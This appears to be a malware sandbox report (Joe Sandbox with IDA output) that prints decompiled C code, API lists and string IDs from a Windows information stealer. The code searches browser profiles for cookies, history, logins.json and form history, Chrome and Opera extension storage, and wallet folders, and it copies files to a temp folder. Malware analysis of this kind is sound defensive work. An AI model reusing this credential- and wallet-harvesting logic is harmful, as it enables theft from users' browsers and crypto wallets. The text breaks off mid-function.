                                                                                • lstrcpy.KERNEL32(?,?), ref: 00409C9B
                                                                                • lstrcpy.KERNEL32(?,?), ref: 00409CB7
                                                                                  • Part of subcall function 004099A5: _strtok_s.LIBCMT ref: 004099E3
                                                                                • lstrcpy.KERNEL32(?,00000000), ref: 00409CD8
                                                                                • lstrlenA.KERNEL32(?), ref: 00409D0D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrcpy$_memset$Drivelstrcat$FolderH_prolog3LogicalPathStringsType_strtok_slstrcpynlstrlenwsprintf
                                                                                • String ID: %APPDATA%$%DESKTOP%$%DOCUMENTS%$%DRIVE_FIXED%$%DRIVE_REMOVABLE%$%LOCALAPPDATA%$%PROGRAMFILES%$%PROGRAMFILES_86%$%RECENT%$%USERPROFILE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*$*%RECENT%*$.zip
                                                                                • API String ID: 3100847841-1612159102
                                                                                • Opcode ID: 0a2501d2ad76a45b82fbd9b8ed816edf00a6a0b3f89f10aae08af88ada6ea9df
                                                                                • Instruction ID: 7df28f63952bef75c9b69aabc1cc39a606bfe1fa0181df622ddb134d054c93b0
                                                                                • Opcode Fuzzy Hash: 0a2501d2ad76a45b82fbd9b8ed816edf00a6a0b3f89f10aae08af88ada6ea9df
                                                                                • Instruction Fuzzy Hash: F7917372D4421CAFEB159B90DC4AEEA77BDFB09304F1004ABF208A2191DAB59FD48F55
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrcat$FileFind_memset$CloseCopyFirstH_prolog3H_prolog3_Nextwsprintf
                                                                                • String ID: %s\*$Plugins$Wallets$\files\
                                                                                • API String ID: 2810030407-2671555165
                                                                                • Opcode ID: f5633556d795729b159d8ee091ff9f2f297195aea18512963beece4d6e863d2d
                                                                                • Instruction ID: eb93aab47b2980ae96ce8e3c1833348d0c4586612727bdcd52a1e8fbdb9bdf17
                                                                                • Opcode Fuzzy Hash: f5633556d795729b159d8ee091ff9f2f297195aea18512963beece4d6e863d2d
                                                                                • Instruction Fuzzy Hash: A461FAB290022CAFCB64DFA0DD89EDA777CAB09705F0444E6B609E2051DA349BD9CF65
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 57%
                                                                                			E00412D6E(void* __ebx, intOrPtr __ecx, CHAR* __edi, void* __esi, void* __eflags) {
                                                                                				void* _t85;
                                                                                				intOrPtr _t98;
                                                                                				signed char _t121;
                                                                                				signed char _t123;
                                                                                				signed char _t125;
                                                                                				void* _t138;
                                                                                				void* _t149;
                                                                                				void* _t150;
                                                                                				intOrPtr _t151;
                                                                                				void* _t152;
                                                                                
                                                                                				_t146 = __edi;
                                                                                				_t140 = __ebx;
                                                                                				_push(0x9a0);
                                                                                				E004219DE(E00436A5F, __ebx, __edi, __esi);
                                                                                				 *((intOrPtr*)(_t149 - 0x99c)) =  *((intOrPtr*)(_t149 + 8));
                                                                                				 *((intOrPtr*)(_t149 - 0x998)) =  *((intOrPtr*)(_t149 + 0xc));
                                                                                				 *((intOrPtr*)(_t149 - 0x9a0)) =  *((intOrPtr*)(_t149 + 0x10));
                                                                                				_t148 = __ecx;
                                                                                				 *((intOrPtr*)(_t149 - 0x9ac)) = __ecx;
                                                                                				 *((intOrPtr*)(_t149 - 0x994)) =  *((intOrPtr*)(_t149 + 0x14));
                                                                                				 *(_t149 - 4) =  *(_t149 - 4) & 0x00000000;
                                                                                				wsprintfA(_t149 - 0x538, "%s\\*.*", __ecx);
                                                                                				_t151 = _t150 + 0xc;
                                                                                				_t85 = FindFirstFileA(_t149 - 0x538, _t149 - 0x990);
                                                                                				 *(_t149 - 0x9a8) = _t85;
                                                                                				if(_t85 == 0xffffffff) {
                                                                                					L23:
                                                                                					E00402C34(_t149 + 0x1c, 1, 0);
                                                                                					return E00421A61(_t140, _t146, _t148);
                                                                                				} else {
                                                                                					_t140 = GetFileAttributesA;
                                                                                					_t146 = "%s\\CURRENT";
                                                                                					goto L3;
                                                                                					L4:
                                                                                					_push("..");
                                                                                					_push(_t149 - 0x964);
                                                                                					if( *0x44a1d8() == 0) {
                                                                                						goto L21;
                                                                                					}
                                                                                					E00427E30(_t149 - 0x118, 0, 0x104);
                                                                                					_t152 = _t151 + 0xc;
                                                                                					_t98 =  *((intOrPtr*)(_t149 + 0x38));
                                                                                					if(_t98 == 0) {
                                                                                						_push(_t149 - 0x964);
                                                                                						L11:
                                                                                						 *0x44a1b8(_t149 - 0x118);
                                                                                						L12:
                                                                                						wsprintfA(_t149 - 0x220, "%s\\%s\\Local Extension Settings\\%s", _t148, _t149 - 0x118,  *((intOrPtr*)(_t149 - 0x998)));
                                                                                						wsprintfA(_t149 - 0x640, _t146, _t149 - 0x220);
                                                                                						wsprintfA(_t149 - 0x430, "%s\\%s\\Sync Extension Settings\\%s", _t148, _t149 - 0x118,  *((intOrPtr*)(_t149 - 0x998)));
                                                                                						wsprintfA(_t149 - 0x748, _t146, _t149 - 0x430);
                                                                                						wsprintfA(_t149 - 0x328, "%s\\%s\\IndexedDB\\chrome-extension_%s_0.indexeddb.leveldb", _t148, _t149 - 0x118,  *((intOrPtr*)(_t149 - 0x998)));
                                                                                						wsprintfA(_t149 - 0x850, _t146, _t149 - 0x328);
                                                                                						_t151 = _t152 + 0x60;
                                                                                						_t121 = GetFileAttributesA(_t149 - 0x640);
                                                                                						if(_t121 != 0xffffffff) {
                                                                                							_t166 = _t121 & 0x00000010;
                                                                                							if((_t121 & 0x00000010) == 0) {
                                                                                								_t151 = _t151 - 0x1c;
                                                                                								_t148 = _t151;
                                                                                								 *((intOrPtr*)(_t149 - 0x9a4)) = _t151;
                                                                                								E0040410F(_t151, _t149 + 0x1c);
                                                                                								_push( *((intOrPtr*)(_t149 + 0x18)));
                                                                                								_push(_t149 - 0x118);
                                                                                								_push( *((intOrPtr*)(_t149 - 0x994)));
                                                                                								_push( *((intOrPtr*)(_t149 - 0x9a0)));
                                                                                								_push( *((intOrPtr*)(_t149 - 0x99c)));
                                                                                								E00412AE1(_t140, _t149 - 0x220, _t146, _t151, _t166);
                                                                                							}
                                                                                						}
                                                                                						_t123 = GetFileAttributesA(_t149 - 0x748);
                                                                                						if(_t123 != 0xffffffff) {
                                                                                							_t168 = _t123 & 0x00000010;
                                                                                							if((_t123 & 0x00000010) == 0) {
                                                                                								_t151 = _t151 - 0x1c;
                                                                                								_t148 = _t151;
                                                                                								 *((intOrPtr*)(_t149 - 0x9a4)) = _t151;
                                                                                								E0040410F(_t151, _t149 + 0x1c);
                                                                                								_push( *((intOrPtr*)(_t149 + 0x18)));
                                                                                								_push(_t149 - 0x118);
                                                                                								_push( *((intOrPtr*)(_t149 - 0x994)));
                                                                                								_push( *((intOrPtr*)(_t149 - 0x9a0)));
                                                                                								_push( *((intOrPtr*)(_t149 - 0x99c)));
                                                                                								E00412AE1(_t140, _t149 - 0x430, _t146, _t151, _t168);
                                                                                							}
                                                                                						}
                                                                                						_t125 = GetFileAttributesA(_t149 - 0x850);
                                                                                						if(_t125 != 0xffffffff) {
                                                                                							_t170 = _t125 & 0x00000010;
                                                                                							if((_t125 & 0x00000010) == 0) {
                                                                                								_t151 = _t151 - 0x1c;
                                                                                								_t148 = _t151;
                                                                                								 *((intOrPtr*)(_t149 - 0x9a4)) = _t151;
                                                                                								E0040410F(_t151, _t149 + 0x1c);
                                                                                								_push( *((intOrPtr*)(_t149 + 0x18)));
                                                                                								_push(_t149 - 0x118);
                                                                                								_push( *((intOrPtr*)(_t149 - 0x994)));
                                                                                								_push( *((intOrPtr*)(_t149 - 0x9a0)));
                                                                                								_push( *((intOrPtr*)(_t149 - 0x99c)));
                                                                                								E00412AE1(_t140, _t149 - 0x328, _t146, _t151, _t170);
                                                                                							}
                                                                                						}
                                                                                						goto L21;
                                                                                					}
                                                                                					_t138 = _t98 - 1;
                                                                                					if(_t138 == 0) {
                                                                                						_push("Opera Stable");
                                                                                						goto L11;
                                                                                					}
                                                                                					if(_t138 != 1) {
                                                                                						goto L12;
                                                                                					} else {
                                                                                						_push("Opera GX Stable");
                                                                                						goto L11;
                                                                                					}
                                                                                					L21:
                                                                                					if(FindNextFileA( *(_t149 - 0x9a8), _t149 - 0x990) != 0) {
                                                                                						_t148 =  *((intOrPtr*)(_t149 - 0x9ac));
                                                                                						L3:
                                                                                						_push(".");
                                                                                						_push(_t149 - 0x964);
                                                                                						if( *0x44a1d8() == 0) {
                                                                                							goto L21;
                                                                                						}
                                                                                						goto L4;
                                                                                					}
                                                                                					FindClose( *(_t149 - 0x9a8));
                                                                                					goto L23;
                                                                                				}
                                                                                			}













                                                                                0x00000000
                                                                                0x00412e51
                                                                                0x00412e51
                                                                                0x00000000
                                                                                0x00412e51
                                                                                0x0041300b
                                                                                0x00413020
                                                                                0x00412df3
                                                                                0x00412df9
                                                                                0x00412df9
                                                                                0x00412e04
                                                                                0x00412e0d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00412e0d
                                                                                0x0041302c
                                                                                0x00000000
                                                                                0x0041302c

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: wsprintf$File$AttributesFind$CloseFirstH_prolog3_Next_memsetlstrcat
                                                                                • String ID: %s\%s\IndexedDB\chrome-extension_%s_0.indexeddb.leveldb$%s\%s\Local Extension Settings\%s$%s\%s\Sync Extension Settings\%s$%s\*.*$%s\CURRENT$Opera GX Stable$Opera Stable
                                                                                • API String ID: 2911694193-808128889
                                                                                • Opcode ID: ede5c212e9ac8c96bc32fce2e1603e1b3109dd430702a8e7830b8368be6b36d6
                                                                                • Instruction ID: 3091ba9dfd4d52703471345fbe3d32bcf531f4ab9223dbd2c7e7a5c4e3652c12
                                                                                • Opcode Fuzzy Hash: ede5c212e9ac8c96bc32fce2e1603e1b3109dd430702a8e7830b8368be6b36d6
                                                                                • Instruction Fuzzy Hash: B3712BB190122CAFDF20AF64DD45EDA7778AF05304F4400E6FA08E2151D6799BE5CF99
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 50%
                                                                                			E00410EAE(intOrPtr __ecx, char* __edx, char* _a4, intOrPtr _a8, char* _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                				signed int _v12;
                                                                                				char _v280;
                                                                                				char _v544;
                                                                                				char _v808;
                                                                                				struct _WIN32_FIND_DATAA _v1128;
                                                                                				intOrPtr _v1132;
                                                                                				char* _v1136;
                                                                                				void* _v1140;
                                                                                				intOrPtr _v1144;
                                                                                				intOrPtr _v1148;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				void* __ebp;
                                                                                				signed int _t58;
                                                                                				intOrPtr _t61;
                                                                                				int _t66;
                                                                                				void* _t83;
                                                                                				signed int _t85;
                                                                                				signed char _t87;
                                                                                				signed int _t89;
                                                                                				signed int _t91;
                                                                                				intOrPtr _t95;
                                                                                				intOrPtr _t98;
                                                                                				intOrPtr _t103;
                                                                                				char* _t104;
                                                                                				CHAR* _t116;
                                                                                				intOrPtr _t120;
                                                                                				char* _t121;
                                                                                				signed int _t122;
                                                                                				void* _t123;
                                                                                				void* _t124;
                                                                                
                                                                                				_t118 = __edx;
                                                                                				_t58 =  *0x447674; // 0x4124c941
                                                                                				_v12 = _t58 ^ _t122;
                                                                                				_t103 = _a20;
                                                                                				_t121 = _a12;
                                                                                				_t120 = _a16;
                                                                                				_v1136 = _a4;
                                                                                				_t61 = _a8;
                                                                                				_v1144 = _t61;
                                                                                				_v1132 = __ecx;
                                                                                				_v1148 = _t103;
                                                                                				wsprintfA( &_v808, "%s\\*", _t61);
                                                                                				_t124 = _t123 + 0xc;
                                                                                				_t66 = FindFirstFileA( &_v808,  &_v1128);
                                                                                				_v1140 = _t66;
                                                                                				if(_t66 == 0xffffffff) {
                                                                                					L22:
                                                                                					return E0041DEB4(_t66, _t103, _v12 ^ _t122, _t118, _t120, _t121);
                                                                                				} else {
                                                                                					goto L1;
                                                                                				}
                                                                                				do {
                                                                                					L1:
                                                                                					_push(".");
                                                                                					_push( &(_v1128.cFileName));
                                                                                					if( *0x44a1d8() == 0) {
                                                                                						goto L20;
                                                                                					}
                                                                                					_push("..");
                                                                                					_push( &(_v1128.cFileName));
                                                                                					if( *0x44a1d8() == 0) {
                                                                                						goto L20;
                                                                                					}
                                                                                					wsprintfA( &_v280, "%s\\%s", _v1144,  &(_v1128.cFileName));
                                                                                					E00427E30( &_v544, 0, 0x104);
                                                                                					wsprintfA( &_v544, "%s\\%s\\%s\\%s", _v1144,  &(_v1128.cFileName), "Network", "Cookies");
                                                                                					_t124 = _t124 + 0x34;
                                                                                					_t83 =  *0x44a1d8( &(_v1128.cFileName),  *0x449ce8);
                                                                                					_t129 = _t83;
                                                                                					if(_t83 != 0) {
                                                                                						_t85 =  *0x44a1d8( &(_v1128.cFileName),  *0x449b6c);
                                                                                						__eflags = _t85;
                                                                                						if(_t85 != 0) {
                                                                                							_t87 = GetFileAttributesA( &_v544);
                                                                                							__eflags = _t87 - 0xffffffff;
                                                                                							if(_t87 == 0xffffffff) {
                                                                                								L12:
                                                                                								_t89 =  *0x44a1d8( &(_v1128.cFileName), "History");
                                                                                								__eflags = _t89;
                                                                                								if(_t89 != 0) {
                                                                                									_t91 =  *0x44a1d8( &(_v1128.cFileName),  *0x449bc8);
                                                                                									__eflags = _t91;
                                                                                									if(_t91 != 0) {
                                                                                										__eflags = _v1128.dwFileAttributes & 0x00000010;
                                                                                										if((_v1128.dwFileAttributes & 0x00000010) == 0) {
                                                                                											goto L20;
                                                                                										}
                                                                                										goto L19;
                                                                                									}
                                                                                									_t95 = _v1132;
                                                                                									__eflags =  *((char*)(_t95 + 1));
                                                                                									if( *((char*)(_t95 + 1)) != 0) {
                                                                                										E00410130( &_v280, _v1136, _t121, _t120, _t103);
                                                                                										_t118 = _v1136;
                                                                                										_t124 = _t124 + 0xc;
                                                                                										_push(_t121);
                                                                                										E00410396( &_v280, _v1136);
                                                                                									}
                                                                                									goto L19;
                                                                                								}
                                                                                								_t98 = _v1132;
                                                                                								__eflags =  *((char*)(_t98 + 2));
                                                                                								if( *((char*)(_t98 + 2)) != 0) {
                                                                                									_t104 = _v1136;
                                                                                									_push(_t121);
                                                                                									E004104F2(_t104,  &_v280, _t118);
                                                                                									_push(_t121);
                                                                                									_t118 = _t104;
                                                                                									E00410639( &_v280, _t104);
                                                                                									_t103 = _v1148;
                                                                                								}
                                                                                								goto L19;
                                                                                							}
                                                                                							__eflags = _t87 & 0x00000010;
                                                                                							if((_t87 & 0x00000010) != 0) {
                                                                                								goto L12;
                                                                                							}
                                                                                							_t118 =  &(_v1128.cFileName);
                                                                                							_t116 =  &_v544;
                                                                                							L8:
                                                                                							E0040FDEC(_t116, _t118, _t121, _t120, _t103);
                                                                                							goto L5;
                                                                                						}
                                                                                						_t118 = _v1136;
                                                                                						_t116 =  &_v280;
                                                                                						goto L8;
                                                                                					} else {
                                                                                						_push(_t103);
                                                                                						_push(_t120);
                                                                                						_push(_t121);
                                                                                						E0040FA8E(_t103,  &_v280, _t120, _t121, _t129);
                                                                                						L5:
                                                                                						_t124 = _t124 + 0xc;
                                                                                						L19:
                                                                                						E00410EAE(_v1132, _t118,  &(_v1128.cFileName),  &_v280, _t121, _t120, _t103);
                                                                                					}
                                                                                					L20:
                                                                                				} while (FindNextFileA(_v1140,  &_v1128) != 0);
                                                                                				_t66 = FindClose(_v1140);
                                                                                				goto L22;
                                                                                			}

                                                                                APIs
                                                                                • wsprintfA.USER32 ref: 00410EF8
                                                                                • FindFirstFileA.KERNEL32(?,?), ref: 00410F0F
                                                                                • StrCmpCA.SHLWAPI(?,00440CA4), ref: 00410F30
                                                                                • StrCmpCA.SHLWAPI(?,00440CA8), ref: 00410F4A
                                                                                • wsprintfA.USER32 ref: 00410F71
                                                                                • _memset.LIBCMT ref: 00410F85
                                                                                • wsprintfA.USER32 ref: 00410FB0
                                                                                • StrCmpCA.SHLWAPI(?), ref: 00410FC6
                                                                                • StrCmpCA.SHLWAPI(?), ref: 00410FF3
                                                                                  • Part of subcall function 0040FA8E: __EH_prolog3_GS.LIBCMT ref: 0040FA98
                                                                                  • Part of subcall function 0040FA8E: GetCurrentDirectoryA.KERNEL32(00000104,?,00000180,00410FDE,?,?,?), ref: 0040FAC6
                                                                                  • Part of subcall function 0040FA8E: lstrcat.KERNEL32(?,\temp), ref: 0040FAD8
                                                                                  • Part of subcall function 0040FA8E: CopyFileA.KERNEL32 ref: 0040FAE8
                                                                                  • Part of subcall function 0040FA8E: StrCmpCA.SHLWAPI(?,0043E028), ref: 0040FBEE
                                                                                  • Part of subcall function 0040FA8E: StrCmpCA.SHLWAPI(?,0043E028), ref: 0040FC03
                                                                                • GetFileAttributesA.KERNEL32(?), ref: 0041101A
                                                                                • StrCmpCA.SHLWAPI(?,History), ref: 00411043
                                                                                • StrCmpCA.SHLWAPI(?), ref: 00411094
                                                                                • FindNextFileA.KERNEL32(?,?), ref: 00411108
                                                                                • FindClose.KERNEL32(?), ref: 0041111C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$Findwsprintf$AttributesCloseCopyCurrentDirectoryFirstH_prolog3_Next_memsetlstrcat
                                                                                • String ID: %s\%s$%s\%s\%s\%s$%s\*$Cookies$History$Network
                                                                                • API String ID: 2822449826-2179649295
                                                                                • Opcode ID: 1237bb0c27e4283f7b72283bfadd07c7e3b69771b6c6cf49debf117e223b815b
                                                                                • Instruction ID: d91424bcce5c9974c5de546805ec42939d57a20607f808674c0f35252fd55063
                                                                                • Opcode Fuzzy Hash: 1237bb0c27e4283f7b72283bfadd07c7e3b69771b6c6cf49debf117e223b815b
                                                                                • Instruction Fuzzy Hash: 3D615FB190021C9BDB24DF64DC89FDAB77CAB09304F4040EAA609A3161EB759ED5CF69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 20%
                                                                                			E00411133(void* __ecx, CHAR* _a4, char _a8, char _a12) {
                                                                                				signed int _v12;
                                                                                				char _v280;
                                                                                				char _v544;
                                                                                				struct _WIN32_FIND_DATAA _v864;
                                                                                				CHAR* _v868;
                                                                                				void* _v872;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				signed int _t33;
                                                                                				CHAR* _t35;
                                                                                				int _t40;
                                                                                				void* _t58;
                                                                                				CHAR* _t66;
                                                                                				void* _t77;
                                                                                				intOrPtr _t78;
                                                                                				signed int _t79;
                                                                                				void* _t80;
                                                                                				void* _t81;
                                                                                
                                                                                				_t33 =  *0x447674; // 0x4124c941
                                                                                				_v12 = _t33 ^ _t79;
                                                                                				_t2 =  &_a8; // 0x43e028
                                                                                				_t35 =  *_t2;
                                                                                				_t66 = _a4;
                                                                                				_t4 =  &_a12; // 0x413e28
                                                                                				_t78 =  *_t4;
                                                                                				_v868 = _t35;
                                                                                				_t77 = __ecx;
                                                                                				wsprintfA( &_v544, "%s\\*", _t35);
                                                                                				_t81 = _t80 + 0xc;
                                                                                				_t40 = FindFirstFileA( &_v544,  &_v864);
                                                                                				_v872 = _t40;
                                                                                				if(_t40 != 0xffffffff) {
                                                                                					do {
                                                                                						_push(".");
                                                                                						_push( &(_v864.cFileName));
                                                                                						if( *0x44a1d8() != 0) {
                                                                                							_push("..");
                                                                                							_push( &(_v864.cFileName));
                                                                                							if( *0x44a1d8() != 0) {
                                                                                								wsprintfA( &_v280, "%s\\%s", _v868,  &(_v864.cFileName));
                                                                                								_t81 = _t81 + 0x10;
                                                                                								_push("cookies.sqlite");
                                                                                								_push( &(_v864.cFileName));
                                                                                								if( *0x44a1d8() != 0) {
                                                                                									_push("formhistory.sqlite");
                                                                                									_push( &(_v864.cFileName));
                                                                                									if( *0x44a1d8() != 0) {
                                                                                										_push("logins.json");
                                                                                										_push( &(_v864.cFileName));
                                                                                										if( *0x44a1d8() != 0) {
                                                                                											_t58 =  *0x44a1d8( &(_v864.cFileName), "places.sqlite");
                                                                                											if(_t58 != 0) {
                                                                                												if((_v864.dwFileAttributes & 0x00000010) != 0) {
                                                                                													goto L14;
                                                                                												}
                                                                                											} else {
                                                                                												if( *((intOrPtr*)(_t77 + 2)) != _t58) {
                                                                                													_push(_t78);
                                                                                													E00410C17(_t66,  &_v280, _t76);
                                                                                													goto L5;
                                                                                												}
                                                                                												goto L14;
                                                                                											}
                                                                                										} else {
                                                                                											_push(_t78);
                                                                                											E0041078A(_v868, _t76);
                                                                                											goto L5;
                                                                                										}
                                                                                									} else {
                                                                                										_push(_t78);
                                                                                										_t76 = _t66;
                                                                                										E00410D54( &_v280, _t66);
                                                                                										goto L5;
                                                                                									}
                                                                                								} else {
                                                                                									_push(_t78);
                                                                                									_t76 = _t66;
                                                                                									E004109F6( &_v280, _t66);
                                                                                									L5:
                                                                                									L14:
                                                                                									E00411133(_t77,  &(_v864.cFileName),  &_v280, _t78);
                                                                                								}
                                                                                							}
                                                                                						}
                                                                                					} while (FindNextFileA(_v872,  &_v864) != 0);
                                                                                					_t40 = FindClose(_v872);
                                                                                				}
                                                                                				return E0041DEB4(_t40, _t66, _v12 ^ _t79, _t76, _t77, _t78);
                                                                                			}


                                                                                APIs
                                                                                • wsprintfA.USER32 ref: 00411167
                                                                                • FindFirstFileA.KERNEL32(?,?), ref: 0041117E
                                                                                • StrCmpCA.SHLWAPI(?,00440CA4), ref: 0041119F
                                                                                • StrCmpCA.SHLWAPI(?,00440CA8), ref: 004111B9
                                                                                • wsprintfA.USER32 ref: 004111E0
                                                                                • StrCmpCA.SHLWAPI(?,cookies.sqlite), ref: 004111F5
                                                                                • StrCmpCA.SHLWAPI(?,formhistory.sqlite), ref: 0041121C
                                                                                  • Part of subcall function 004109F6: GetCurrentDirectoryA.KERNEL32(00000104,?,?,(>A(C,?), ref: 00410A2E
                                                                                  • Part of subcall function 004109F6: lstrcat.KERNEL32(?,\temp), ref: 00410A40
                                                                                  • Part of subcall function 004109F6: CopyFileA.KERNEL32 ref: 00410A50
                                                                                  • Part of subcall function 004109F6: _memset.LIBCMT ref: 00410A5D
                                                                                  • Part of subcall function 004109F6: wsprintfA.USER32 ref: 00410A6F
                                                                                • StrCmpCA.SHLWAPI(?,logins.json), ref: 00411242
                                                                                • StrCmpCA.SHLWAPI(?,places.sqlite), ref: 00411266
                                                                                • FindNextFileA.KERNEL32(?,?), ref: 004112AF
                                                                                • FindClose.KERNEL32(?), ref: 004112C3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileFindwsprintf$CloseCopyCurrentDirectoryFirstNext_memsetlstrcat
                                                                                • String ID: %s\%s$%s\*$(>A(C$(C$cookies.sqlite$formhistory.sqlite$logins.json$places.sqlite
                                                                                • API String ID: 1611843655-513356000
                                                                                • Opcode ID: 526c7f9c89961249f420c482e6d79a38d8f49b15045f6f76ba119eaccf9901a8
                                                                                • Instruction ID: 49932d78ffe5ae1d6c696c91741bb45e5ad2906601964bfe3083489789689966
                                                                                • Opcode Fuzzy Hash: 526c7f9c89961249f420c482e6d79a38d8f49b15045f6f76ba119eaccf9901a8
                                                                                • Instruction Fuzzy Hash: 1B418E35940218ABDB25EF60DC85FEA77BCAB05300F0441EBB609E2160EB389BD5CF59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 67%
                                                                                			E00411E67(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                				void* _t64;
                                                                                				void* _t70;
                                                                                				void* _t84;
                                                                                				CHAR* _t86;
                                                                                				int _t89;
                                                                                				void* _t94;
                                                                                				CHAR* _t96;
                                                                                				void* _t101;
                                                                                				CHAR* _t103;
                                                                                				CHAR* _t126;
                                                                                				void* _t127;
                                                                                				void* _t128;
                                                                                				void* _t130;
                                                                                				void* _t131;
                                                                                				void* _t132;
                                                                                				void* _t133;
                                                                                
                                                                                				_t133 = __eflags;
                                                                                				_push(0x4e0);
                                                                                				E004219DE(E004366DD, __ebx, __edi, __esi);
                                                                                				_push( *0x449bb4);
                                                                                				_t126 =  *((intOrPtr*)(_t127 + 0xc));
                                                                                				 *((intOrPtr*)(_t127 - 0x4e8)) = __ecx;
                                                                                				_t123 = __ecx + 8;
                                                                                				 *((intOrPtr*)(_t127 - 0x4dc)) =  *((intOrPtr*)(_t127 + 8));
                                                                                				_push(_t127 - 0x360);
                                                                                				 *((intOrPtr*)(_t127 - 0x4ec)) = _t126;
                                                                                				 *(_t127 - 0x4e4) =  *(_t127 + 0x10);
                                                                                				E0040D337(__ebx, __ecx + 8, _t126, _t133);
                                                                                				 *((intOrPtr*)(_t127 - 4)) = 0;
                                                                                				_push( *0x449ea8);
                                                                                				_t64 = E0041F644(0, _t123, _t126, _t133);
                                                                                				_t114 = _t127 - 0x344;
                                                                                				 *((intOrPtr*)(_t127 - 0x330)) = 0xf;
                                                                                				 *((intOrPtr*)(_t127 - 0x334)) = 0;
                                                                                				 *((char*)(_t127 - 0x344)) = 0;
                                                                                				E0040381A(_t127 - 0x344, _t64);
                                                                                				 *((char*)(_t127 - 4)) = 1;
                                                                                				wsprintfA(_t127 - 0x328, "%s\\*", _t126);
                                                                                				_t130 = _t128 + 0x18;
                                                                                				_t70 = FindFirstFileA(_t127 - 0x328, _t127 - 0x4d8);
                                                                                				 *(_t127 - 0x4e0) = _t70;
                                                                                				if(_t70 == 0xffffffff) {
                                                                                					L16:
                                                                                					E00402C34(_t127 - 0x344, 1, 0);
                                                                                					E00402C34(_t127 - 0x360, 1, 0);
                                                                                					return E00421A61(0, _t123, _t126);
                                                                                				}
                                                                                				_t126 = "\\";
                                                                                				do {
                                                                                					_push(".");
                                                                                					_push(_t127 - 0x4ac);
                                                                                					if( *0x44a1d8() != 0) {
                                                                                						_push("..");
                                                                                						_push(_t127 - 0x4ac);
                                                                                						if( *0x44a1d8() != 0) {
                                                                                							_t123 = "%s\\%s";
                                                                                							wsprintfA(_t127 - 0x220, _t123,  *((intOrPtr*)(_t127 - 0x4ec)), _t127 - 0x4ac);
                                                                                							_t131 = _t130 + 0x10;
                                                                                							_t84 =  *0x44a1d8( *((intOrPtr*)(_t127 - 0x4dc)), 0x43e028);
                                                                                							_push(_t127 - 0x4ac);
                                                                                							_t86 = _t127 - 0x118;
                                                                                							if(_t84 != 0) {
                                                                                								wsprintfA(_t86, _t123,  *((intOrPtr*)(_t127 - 0x4dc)));
                                                                                								_t130 = _t131 + 0x10;
                                                                                							} else {
                                                                                								wsprintfA(_t86, "%s");
                                                                                								_t130 = _t131 + 0xc;
                                                                                							}
                                                                                							_t89 = PathMatchSpecA(_t127 - 0x4ac,  *(_t127 - 0x4e4));
